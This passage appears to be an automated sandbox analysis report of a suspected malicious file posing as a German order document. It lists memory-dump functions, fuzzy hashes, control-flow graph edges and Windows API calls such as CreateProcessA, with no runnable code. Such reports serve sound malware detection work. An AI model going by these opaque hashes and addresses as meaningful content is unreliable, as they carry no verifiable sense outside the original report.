                                                                            Function 05049AD0 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $'q
                                                                            • API String ID: 0-3923516549
                                                                            • Opcode ID: 9d724f5b38df9199f2c9133941f32af71144c2a3c65eeef381cbf087e46374ca
                                                                            • Instruction ID: e53e9d0fdf8cb2b071f6826b360bb63db7bf62d043ebed2ae6dc18b7da1bf008
                                                                            • Opcode Fuzzy Hash: 9d724f5b38df9199f2c9133941f32af71144c2a3c65eeef381cbf087e46374ca
                                                                            • Instruction Fuzzy Hash: 6FC19F70A002098FDB44EFB8D895A6EB7F2FF84340F108979E509AF395DB74E9458B91
                                                                            Function 05049AC1 Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $'q
                                                                            • API String ID: 0-3923516549
                                                                            • Opcode ID: 8fed18a185443275569d5d9b70fce2945d7fe2db848f23ed5e32388117302c4f
                                                                            • Instruction ID: 6e19386e74f985aabdd6ad7ae9a29dfc54bd02b947a5026ccd68ada7778995d3
                                                                            • Opcode Fuzzy Hash: 8fed18a185443275569d5d9b70fce2945d7fe2db848f23ed5e32388117302c4f
                                                                            • Instruction Fuzzy Hash: 5DC1A074A00205CFDB44EFB8D895AAEB7F2FF84340F108969E409AF395DB74E9458B91
                                                                            Function 098005B8 Relevance: .4, Instructions: 403COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 33e6b4f259fd2ed6d86a30791da6d1bf10ce22139b81d07cc7b39321b1f945a8
                                                                            • Instruction ID: 760c966f7bb1867cff7b4561146719bc04bb15dae15c395699ffcc194a07594b
                                                                            • Opcode Fuzzy Hash: 33e6b4f259fd2ed6d86a30791da6d1bf10ce22139b81d07cc7b39321b1f945a8
                                                                            • Instruction Fuzzy Hash: 6CF1E470E05248CFD7458FA8CC627AEBBB1BF85314F14816AE595EB3D1CB349942CB92
                                                                            Function 09801628 Relevance: .3, Instructions: 316COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cf556f2eb6829869607d06d22aeed489a6d59a70cb5a75de21a4d12c54b14427
                                                                            • Instruction ID: d4d3778aaaaf91046e2b73230fa7ea0c79fb63741e1833f5df9178134ac846ed
                                                                            • Opcode Fuzzy Hash: cf556f2eb6829869607d06d22aeed489a6d59a70cb5a75de21a4d12c54b14427
                                                                            • Instruction Fuzzy Hash: DBC12735A0D345CBD3418B69CC597AABBA2EFC2324F1441AEE065DF3D2C7359942C752
                                                                            Function 00FC1A14 Relevance: .3, Instructions: 316COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f4bb0929c5f44b15f6edcadcf496de21ec16196614d5282c3077a77cc75d5b3e
                                                                            • Instruction ID: b462da227282ca35eff1c9549849519b7f61746326a3e7867b2298a0cb6dcae0
                                                                            • Opcode Fuzzy Hash: f4bb0929c5f44b15f6edcadcf496de21ec16196614d5282c3077a77cc75d5b3e
                                                                            • Instruction Fuzzy Hash: 81C12972909242CFC345CF34CAA2F99BBB1FB55300756859ED4828F691C734E95AEB82
                                                                            Function 00FC1E3A Relevance: .3, Instructions: 313COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 07515f09002abe760cabae6e9329206b9530cf778b636412dceb6257a331aa64
                                                                            • Instruction ID: e69637971f781c78c3a0280f7edfc9f71c1b4f934595d6fc793c0d12efa38474
                                                                            • Opcode Fuzzy Hash: 07515f09002abe760cabae6e9329206b9530cf778b636412dceb6257a331aa64
                                                                            • Instruction Fuzzy Hash: 35C12972909246CFC345CF74CAA6F99BBB1FB06300756459FD4828F691C730E95AEB82
                                                                            Function 00FC1FE2 Relevance: .3, Instructions: 302COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6f86089de7b98e375f2b0e97dc8cdf3360fb076074af252fd841614395c65e23
                                                                            • Instruction ID: 381dd60a492073cad39851fcc4f5e0ad12193976b4e0b424881b281095e9ef28
                                                                            • Opcode Fuzzy Hash: 6f86089de7b98e375f2b0e97dc8cdf3360fb076074af252fd841614395c65e23
                                                                            • Instruction Fuzzy Hash: 78B11972909246CFC341CF34CAA6F99BBB1FB05300756859ED4828F691C734E95AEB86
                                                                            Function 00FC1B9C Relevance: .3, Instructions: 299COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2aa7a417beb4d721bb60bb0b5ec1ef2c4d8beb415365ba4edd8d9a9fa953e9fb
                                                                            • Instruction ID: 383e6564c81190e9537ca2ef7a93706c55863568c2c77ebd6662f2742adbab50
                                                                            • Opcode Fuzzy Hash: 2aa7a417beb4d721bb60bb0b5ec1ef2c4d8beb415365ba4edd8d9a9fa953e9fb
                                                                            • Instruction Fuzzy Hash: C5B12972509243CFC345CF34CAA6F99BFA1FB46300756859ED4828F691C730E95AEB82
                                                                            Function 00FC1CA7 Relevance: .3, Instructions: 297COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0bde55f70f6a8cea7c7bf86d017c7c0c51d993c4fc54a49747ccdff0e968e714
                                                                            • Instruction ID: ecd6f75d7ae2541879accea2bb4aebc1a90c7c6b0e26b5f25a82f1c88c5517fc
                                                                            • Opcode Fuzzy Hash: 0bde55f70f6a8cea7c7bf86d017c7c0c51d993c4fc54a49747ccdff0e968e714
                                                                            • Instruction Fuzzy Hash: D8B12972509243CFC345CF34CAA6F99BBA1FB06300756859ED4828F691C730E95AEB86
                                                                            Function 00FC1E03 Relevance: .3, Instructions: 297COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 477ae5c764236a282978433f0b81dfd1cd9edf1ca0840882da0162d5b90cb602
                                                                            • Instruction ID: 882b81b89f8d53746b985c3b755d195d45ec717d397a14448c823f268a61953e
                                                                            • Opcode Fuzzy Hash: 477ae5c764236a282978433f0b81dfd1cd9edf1ca0840882da0162d5b90cb602
                                                                            • Instruction Fuzzy Hash: 86B12972509243CFC341CF34CAA6F99BBB1FB06300756859ED4828F691C734E95AEB86
                                                                            Function 00FC2029 Relevance: .3, Instructions: 295COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: decd65c8abdb6c5406b90245add1bbffa24f8f1f1a7b0cc9ccdc3f3fae829a9c
                                                                            • Instruction ID: 94ee48a5c6d8c6fdd6528469cdc6eadd69072ca984c676ddf25fa2af4c9397f7
                                                                            • Opcode Fuzzy Hash: decd65c8abdb6c5406b90245add1bbffa24f8f1f1a7b0cc9ccdc3f3fae829a9c
                                                                            • Instruction Fuzzy Hash: 5AB13A725092438FC385CF34CAA6F997B61FB06300756859FD4828F692C734E95AEB82
                                                                            Function 00FC1AAA Relevance: .3, Instructions: 295COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5344421bcf517f0aa8bce68280004be0e63be1c72b8339aff51c701a5331cd63
                                                                            • Instruction ID: f8698224e07facfd7a19d7f79f7aebb74b7101eb9a3ed214d8150857fdc0aa22
                                                                            • Opcode Fuzzy Hash: 5344421bcf517f0aa8bce68280004be0e63be1c72b8339aff51c701a5331cd63
                                                                            • Instruction Fuzzy Hash: 80B12972509243CFC345CF34CAA6F99BBB1FB06300756859ED4828F691C734E95AEB86
                                                                            Function 00FC1B29 Relevance: .3, Instructions: 295COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d51ec791add94bf739b365d34cc4e3710fdc14e98a5d86ceea68d216bb0483cb
                                                                            • Instruction ID: ed1c0ccebe4be09b6a31390c944757e0d61b3625b8dfb5d02c7e5502eceffd67
                                                                            • Opcode Fuzzy Hash: d51ec791add94bf739b365d34cc4e3710fdc14e98a5d86ceea68d216bb0483cb
                                                                            • Instruction Fuzzy Hash: C8B11972509243CFC345CF34CAA6F99BB61FB06300756859FD4828F692C734E95AEB86
                                                                            Function 00FCA4C2 Relevance: .2, Instructions: 211COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2bc8de367b3fd6045a4b4e64cc875f5d2bb3f83666911b2da95bae0df9629944
                                                                            • Instruction ID: 00de9422b37513bc2bfb27828fa3159829c37625f5a94428319e1ef8025a751a
                                                                            • Opcode Fuzzy Hash: 2bc8de367b3fd6045a4b4e64cc875f5d2bb3f83666911b2da95bae0df9629944
                                                                            • Instruction Fuzzy Hash: FA71C275B0020A8FCB09EB78D956B6EB7B6AFC4314F14882DD406DB291CB78EC059B52
                                                                            Function 00FC2290 Relevance: .2, Instructions: 187COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e78597e9c9675ddcd275d7db6f930d95b7d0ea526768a15732c3623474043cb1
                                                                            • Instruction ID: 37e4a366a5ffb019841dacc1a401ef98920a58811947dc393b39d53179c9ac61
                                                                            • Opcode Fuzzy Hash: e78597e9c9675ddcd275d7db6f930d95b7d0ea526768a15732c3623474043cb1
                                                                            • Instruction Fuzzy Hash: 7471AF32604207DFD384CF68C6D2F6AB7A5FB48300B62496AD506DF7A0C735ED61AB85
                                                                            Function 00FC2280 Relevance: .2, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6a105b8f643d01f33a08fc8d1e24e50221bb495f2e1196ce8efaa8ac2e030d6
                                                                            • Instruction ID: 80cd730901730b97d7325d1c179f3ccedab0425f6951947030ec5ce89f8a9ef3
                                                                            • Opcode Fuzzy Hash: b6a105b8f643d01f33a08fc8d1e24e50221bb495f2e1196ce8efaa8ac2e030d6
                                                                            • Instruction Fuzzy Hash: 7271AE32A04207CFD384CF64C6D2F6AB7A1FB48300B62496ED507DF6A1C734E961AB85
                                                                            Function 00FC7374 Relevance: .2, Instructions: 179COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1447897059.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_fc0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be38bc44b485a89027a6b005517f4abae3a1d35263b0b29723d3c826adff2145
                                                                            • Instruction ID: f8052960dccf48e0eb45ba1a9ba7942b23aad61fd1a9c62821a8aa1ea0139c0d
                                                                            • Opcode Fuzzy Hash: be38bc44b485a89027a6b005517f4abae3a1d35263b0b29723d3c826adff2145
                                                                            • Instruction Fuzzy Hash: A551C73570020A8BCB09EB78D95AB2FB6A7AFC4314B14882DD506DB795CF78EC059B52
                                                                            Function 0980E220 Relevance: .2, Instructions: 164COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4b886d8647377159737cc636d164276e47822f38455e527cf4c4d9858f4bf483
                                                                            • Instruction ID: ebfd960adeb350c4459aae0a2713b094529daec5ee0a942020d0df9daca467c4
                                                                            • Opcode Fuzzy Hash: 4b886d8647377159737cc636d164276e47822f38455e527cf4c4d9858f4bf483
                                                                            • Instruction Fuzzy Hash: 93611871D05229CBDB68CF66CC507EABBB6BFC9300F14D5AA940DA7291EB705A85CF40
                                                                            Function 0980826F Relevance: .2, Instructions: 162COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e3fed2abede473b47d7fc2002d43804f5c0d81f915c5fa874c3a1493fcfc5430
                                                                            • Instruction ID: ed2d58b9a2d72eb8659eaf086f070c5f28392792e2dee3191285de70424e3ec9
                                                                            • Opcode Fuzzy Hash: e3fed2abede473b47d7fc2002d43804f5c0d81f915c5fa874c3a1493fcfc5430
                                                                            • Instruction Fuzzy Hash: 67613A70E042198FDB14CFA9C9915AEBBB2FF89310F248169D418EB356D7359942CFA1
                                                                            Function 05040A10 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 05040A9E
                                                                            • GetCurrentThread.KERNEL32 ref: 05040ADB
                                                                            • GetCurrentProcess.KERNEL32 ref: 05040B18
                                                                            • GetCurrentThreadId.KERNEL32 ref: 05040B71
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: d31a8d945ea0488304495285e2a908d83bb3a551f2df35cf21b4a245327fdbc8
                                                                            • Instruction ID: 7f39c4646f271156d42a2f13c3dba04222c92ade47279ea285eb2f2894368f3b
                                                                            • Opcode Fuzzy Hash: d31a8d945ea0488304495285e2a908d83bb3a551f2df35cf21b4a245327fdbc8
                                                                            • Instruction Fuzzy Hash: 885188B49003498FEB44CFA9D948BDEBBF1FF88314F248459E509AB2A0C7789944CF65
                                                                            Function 05040A20 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 05040A9E
                                                                            • GetCurrentThread.KERNEL32 ref: 05040ADB
                                                                            • GetCurrentProcess.KERNEL32 ref: 05040B18
                                                                            • GetCurrentThreadId.KERNEL32 ref: 05040B71
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 6128e3160626d93305cee769d6c7edb457f866e4f95541c55efbcfaa3f47cd75
                                                                            • Instruction ID: f2ea109bc8352d40897798108f2f45411d550be14e9869f5446d322d98e3328d
                                                                            • Opcode Fuzzy Hash: 6128e3160626d93305cee769d6c7edb457f866e4f95541c55efbcfaa3f47cd75
                                                                            • Instruction Fuzzy Hash: 425177B49003498FEB54CFA9D948B9EBBF1FF88314F208459E509B72A0D778A944CF65
                                                                            Function 0980B454 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 80 980b454-980b4f5 82 980b4f7-980b501 80->82 83 980b52e-980b54e 80->83 82->83 84 980b503-980b505 82->84 90 980b550-980b55a 83->90 91 980b587-980b5b6 83->91 85 980b507-980b511 84->85 86 980b528-980b52b 84->86 88 980b513 85->88 89 980b515-980b524 85->89 86->83 88->89 89->89 92 980b526 89->92 90->91 93 980b55c-980b55e 90->93 99 980b5b8-980b5c2 91->99 100 980b5ef-980b6a9 CreateProcessA 91->100 92->86 95 980b560-980b56a 93->95 96 980b581-980b584 93->96 97 980b56c 95->97 98 980b56e-980b57d 95->98 96->91 97->98 98->98 101 980b57f 98->101 99->100 102 980b5c4-980b5c6 99->102 111 980b6b2-980b738 100->111 112 980b6ab-980b6b1 100->112 101->96 104 980b5c8-980b5d2 102->104 105 980b5e9-980b5ec 102->105 106 980b5d4 104->106 107 980b5d6-980b5e5 104->107 105->100 106->107 107->107 109 980b5e7 107->109 109->105 122 980b748-980b74c 111->122 123 980b73a-980b73e 111->123 112->111 125 980b75c-980b760 122->125 126 980b74e-980b752 122->126 123->122 124 980b740 123->124 124->122 127 980b770-980b774 125->127 128 980b762-980b766 125->128 126->125 129 980b754 126->129 131 980b786-980b78d 127->131 132 980b776-980b77c 127->132 128->127 130 980b768 128->130 129->125 130->127 133 980b7a4 131->133 134 980b78f-980b79e 131->134 132->131 136 980b7a5 133->136 134->133 136->136
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0980B696
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 0c76bc192b9fd4c5d95ff1f45e6de3bddd83108068f35a7e54488770cd50bfc8
                                                                            • Instruction ID: ab6db8829fe4dd9ffac12a39334ea9386c9419c5d888582ac55369e82d85135f
                                                                            • Opcode Fuzzy Hash: 0c76bc192b9fd4c5d95ff1f45e6de3bddd83108068f35a7e54488770cd50bfc8
                                                                            • Instruction Fuzzy Hash: 60A14B71D003198FEF54CFA8CC517AEBBB2AF88310F1485A9E819E7280DB749985CF91
                                                                            Function 0980B460 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 137 980b460-980b4f5 139 980b4f7-980b501 137->139 140 980b52e-980b54e 137->140 139->140 141 980b503-980b505 139->141 147 980b550-980b55a 140->147 148 980b587-980b5b6 140->148 142 980b507-980b511 141->142 143 980b528-980b52b 141->143 145 980b513 142->145 146 980b515-980b524 142->146 143->140 145->146 146->146 149 980b526 146->149 147->148 150 980b55c-980b55e 147->150 156 980b5b8-980b5c2 148->156 157 980b5ef-980b6a9 CreateProcessA 148->157 149->143 152 980b560-980b56a 150->152 153 980b581-980b584 150->153 154 980b56c 152->154 155 980b56e-980b57d 152->155 153->148 154->155 155->155 158 980b57f 155->158 156->157 159 980b5c4-980b5c6 156->159 168 980b6b2-980b738 157->168 169 980b6ab-980b6b1 157->169 158->153 161 980b5c8-980b5d2 159->161 162 980b5e9-980b5ec 159->162 163 980b5d4 161->163 164 980b5d6-980b5e5 161->164 162->157 163->164 164->164 166 980b5e7 164->166 166->162 179 980b748-980b74c 168->179 180 980b73a-980b73e 168->180 169->168 182 980b75c-980b760 179->182 183 980b74e-980b752 179->183 180->179 181 980b740 180->181 181->179 184 980b770-980b774 182->184 185 980b762-980b766 182->185 183->182 186 980b754 183->186 188 980b786-980b78d 184->188 189 980b776-980b77c 184->189 185->184 187 980b768 185->187 186->182 187->184 190 980b7a4 188->190 191 980b78f-980b79e 188->191 189->188 193 980b7a5 190->193 191->190 193->193
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0980B696
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1499808314.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_9800000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: bd6c1bf76d9da4d07036e6082661b19e646a6d2bfc2e41a94958ed7fd65bfdd8
                                                                            • Instruction ID: ebecbfd62eef41719f984811ff63cf99d1e41f89cd94116e342a4ae240d64a13
                                                                            • Opcode Fuzzy Hash: bd6c1bf76d9da4d07036e6082661b19e646a6d2bfc2e41a94958ed7fd65bfdd8
                                                                            • Instruction Fuzzy Hash: 6F913B71D003198FEF54CFA8CC51BAEBBB2AF84710F1485A9E819E7280DB749985CF91
                                                                            Function 050451E7 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 194 50451e7-5045256 195 5045261-5045268 194->195 196 5045258-504525e 194->196 197 5045273-50452ab 195->197 198 504526a-5045270 195->198 196->195 199 50452b3-5045312 CreateWindowExW 197->199 198->197 200 5045314-504531a 199->200 201 504531b-5045353 199->201 200->201 205 5045355-5045358 201->205 206 5045360 201->206 205->206 207 5045361 206->207 207->207
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05045302
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: fb25c541550092cab3499af4791b85ea6e960471ca50b81a8b4254fc1baebc3b
                                                                            • Instruction ID: 49a333e4b30ceb63a0013adeefc2c0acb10b9948c9f43b37557f48f3463d9856
                                                                            • Opcode Fuzzy Hash: fb25c541550092cab3499af4791b85ea6e960471ca50b81a8b4254fc1baebc3b
                                                                            • Instruction Fuzzy Hash: 6251AFB1D10349DFDB14CFA9D884ADEBBF6BF48310F24812AE819AB250D775A945CF90
                                                                            Function 050451F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 208 50451f0-5045256 209 5045261-5045268 208->209 210 5045258-504525e 208->210 211 5045273-5045312 CreateWindowExW 209->211 212 504526a-5045270 209->212 210->209 214 5045314-504531a 211->214 215 504531b-5045353 211->215 212->211 214->215 219 5045355-5045358 215->219 220 5045360 215->220 219->220 221 5045361 220->221 221->221
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05045302
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1473341014.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5040000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 64afc800afd666d25c080e30d8ac839e2ecad4285996b58740c46b0087c8ead1
                                                                            • Instruction ID: d5518a79cc4d2e592ed70dc0a621dc1a3e01cdb96d65e6352550889b963c80cb
                                                                            • Opcode Fuzzy Hash: 64afc800afd666d25c080e30d8ac839e2ecad4285996b58740c46b0087c8ead1
                                                                            • Instruction Fuzzy Hash: 6C41C0B1D103489FDB14CF9AD884ADEBBF6BF48310F24812AE819AB250D774A845CF90
                                                                            Function 00FC8E34 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
